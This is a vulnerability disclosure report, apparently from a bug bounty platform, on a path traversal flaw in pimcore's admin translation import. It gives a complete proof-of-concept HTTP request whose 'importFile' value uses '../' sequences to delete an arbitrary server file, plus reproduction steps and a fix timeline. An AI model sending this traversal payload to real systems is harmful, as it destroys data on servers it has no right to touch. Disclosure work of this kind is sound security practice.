Path Traversal in pimcore/pimcore

Valid

Reported on

Feb 10th 2022

Description

The application doesn't perform a check/filter against the value of "importFile" parameter at endpoint "/admin/translation/import". After the API is executed, PHP unlink function will proceed to delete the file.

Proof of Concept

Step 1: Login as admin at https://10.x-dev.pimcore.fun/admin.
Step 2: Using burpsuite to proxy request. Go to Settings -> Admin Translations -> Import & Merge CSV
Step 3: Edit value of importFile in request call to /admin/translation/import

POST /admin/translation/import?merge=2 HTTP/1.1
Host: 10.x-dev.pimcore.fun
Cookie: pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MTExLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ0NDgxMjAxLCJfdSI6MTY0NDQ4MjgyMywidmk6c3J1IjpbN119LCJleHAiOjE2NDQ0ODQ2MjN9.0Ezd501szQiJryBsTcmEajyE0cKw3Jy0D7vnaIi0f7M; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MjE4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjQ0NDgxMjAyLCJfdSI6MTY0NDQ4MTIwMn0sImV4cCI6MTY3NjAxODgyM30.QVPovPchi8Amu7U6HfloyPzaqWM9raWqTr8WyaODiHU; _pc_vis=bdd4fff7d63cd197; _pc_ses=1644481631796; _ga=GA1.4.1223340938.1644481632; _gid=GA1.4.1727336840.1644481632; PHPSESSID=8ec8b25fc8744112040d525dc3a0cff0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1644481466&perspective=
X-Pimcore-Csrf-Token: 3940b07522d199209cfd8b6083f0959e0f907449
X-Pimcore-Extjs-Version-Major: 7
X-Pimcore-Extjs-Version-Minor: 0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin: https://10.x-dev.pimcore.fun
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

importFile=../../../../../../../../../var/www/html/vendor/pimcore/pimcore/lib/Model/AbstractModel.php&csvSettings={"delimiter":":","escapechar":"\\","lineterminator":"\n","quotechar":"\""}&domain=admin&delimiter=%3a&escapechar=%5C&lineterminator=%0a&quotechar=%22

Step 4: Logout and go to https://10.x-dev.pimcore.fun/admin, you will see error "Failed opening '/var/www/html/vendor/composer/../pimcore/pimcore/lib/Model/AbstractModel.php' for inclusion". Sorry for my mistake, can you revert https://10.x-dev.pimcore.fun.

PoC:

https://drive.google.com/file/d/17EtF8I3ChKL14uDxaelBa0GLeHq6APjy

https://drive.google.com/file/d/1JnffQheSMgnKeAaQjYQxMHxDwCS3UA80

Root-cause:

Path traversal: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L71
File delete: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L95

Impact

Attacker can delete any file on the server (successful file deletion depends on the current user is running web service)

Occurrences

TranslationController.php L64-L97

We are processing your report and will contact the pimcore team within 24 hours. a year ago

We have contacted a member of the pimcore team and are waiting to hear back a year ago

We have sent a follow up to the pimcore team. We will try again in 7 days. a year ago

JiaJia Ji validated this vulnerability a year ago

nhiephon has been awarded the disclosure bounty

The fix bounty is now up for grabs

We have sent a fix follow up to the pimcore team. We will try again in 7 days. a year ago

Divesh Pahuja marked this as fixed in 10.3.2 with commit 289456 a year ago

Divesh Pahuja has been awarded the fix bounty

This vulnerability will not receive a CVE

TranslationController.php#L64-L97 has been validated

to join this conversation